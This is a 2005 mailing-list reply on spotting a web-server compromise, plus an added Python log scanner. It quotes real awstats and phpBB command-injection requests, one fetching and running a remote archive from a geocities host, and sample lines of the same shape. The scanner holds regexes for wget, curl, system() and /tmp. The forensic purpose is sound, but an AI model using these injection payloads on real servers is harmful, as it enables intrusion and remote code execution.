
Re: a compromised machine



On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> I think one of my servers has been compromised. Since I don't have a lot
> of experience with these things, I beg you for your help.
> 
> The information I have gathered so far is the following. The server
> is running the latest Debian stable, sarge.
> 
> There was heavy traffic on the server and ps aux reported several 
> processes:
> www-data  2459  0.0  0.1  1616  608 ?        S    01:31   0:00 
> /tmp/dlciiqlno x

Since the process runs as "www-data", some kiddy has abused a web service
on your server to download and run external software. Look for
suspicious lines in your web server's logs.

Examples of hacks on our servers:

82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

or

211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"

It should be rather easy to find signs of weird accesses like %20 or
chr(). Also look for weird files in /tmp.

If your server is important you should consider reinstalling.

Regards
 Christoph
-- 
~
~
~
".signature" [Modified] 3 lines --100%--                3,41         All
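The log triage Christoph describes (grep the web server log for encoded shell commands and chr() chains) is easy to do by hand once, but a small script is more reliable, because the interesting payloads are percent-encoded, sometimes twice (the %2527 in the phpBB line decodes to %27 and then to a quote). The following is an added example, not code from the original thread: it parses Apache "combined" log lines, decodes the request target until it stops changing, and flags lines whose decoded form contains shell metacharacters, a download tool, a /tmp path, a PHP exec-style call, or a chr() chain, which it also renders to plain text for the analyst. The sample log lines are constructed for this example, modelled on the two patterns in the mail but with placeholder addresses and hosts.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "METHOD target proto" status bytes "ref" "ua"
# Only the leading fields are captured; referer and user agent are ignored.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Indicators are matched against the fully decoded target, so a legitimate
# "%20" in a file name does not trigger anything on its own.
INDICATORS = {
    "shell_metachar": re.compile(r"[;|`]|\$\("),
    "download_tool": re.compile(r"\b(wget|curl|fetch|lynx)\b", re.I),
    "tmp_path": re.compile(r"/(?:var/)?tmp\b", re.I),
    "php_exec": re.compile(r"\b(system|passthru|exec|shell_exec|eval)\s*\(", re.I),
    "chr_chain": re.compile(r"(?:chr\(\d+\)\s*\.\s*){2,}", re.I),
}


def decode_target(target, max_rounds=3):
    """Percent-decode repeatedly until the string stops changing (handles double encoding)."""
    prev, cur = None, target
    for _ in range(max_rounds):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def chr_chain_to_text(decoded):
    """Turn chr(108).chr(115)... into readable text so the command is visible at a glance."""
    codes = [int(c) for c in re.findall(r"chr\((\d+)\)", decoded, re.I)]
    return "".join(chr(c) for c in codes if 0 <= c < 128)


def scan_line(line):
    """Return a finding dict for a suspicious line, or None for a clean or unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m["target"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not hits:
        return None
    return {
        "host": m["host"],
        "time": m["time"],
        "status": m["status"],
        "indicators": hits,
        "decoded": decoded,
        "chr_text": chr_chain_to_text(decoded),
    }


def scan_log(lines):
    """Scan an iterable of log lines and return the findings in log order."""
    return [f for f in (scan_line(ln) for ln in lines) if f]


# Constructed sample log (RFC 5737 test addresses, .invalid hosts): two clean requests,
# then one shaped like the awstats example and one shaped like the phpBB example.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jul/2005:01:20:11 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [24/Jul/2005:01:21:02 +0200] "GET /docs/my%20file.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Jul/2005:01:30:58 +0200] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20'
    'example.invalid%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20.%2fa HTTP/1.1" 200 422 "-" "Mozilla/4.0"',
    '203.0.113.10 - - [24/Jul/2005:01:31:40 +0200] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem('
    'chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} status={f['status']} {','.join(f['indicators'])}")
        print(f"    decoded: {f['decoded']}")
        if f["chr_text"]:
            print(f"    chr() text: {f['chr_text']}")
```

Run it against a real log with `scan_log(open("/var/log/apache2/access.log"))`; a hit gives you the source address and timestamp to pivot on (matching file times in /tmp, other requests from the same host). Decoding before matching is the important design choice: matching the raw line for `%20` flags every space in a file name, while matching the decoded line for `;`, `|` and `wget` catches the command injection regardless of how it was encoded.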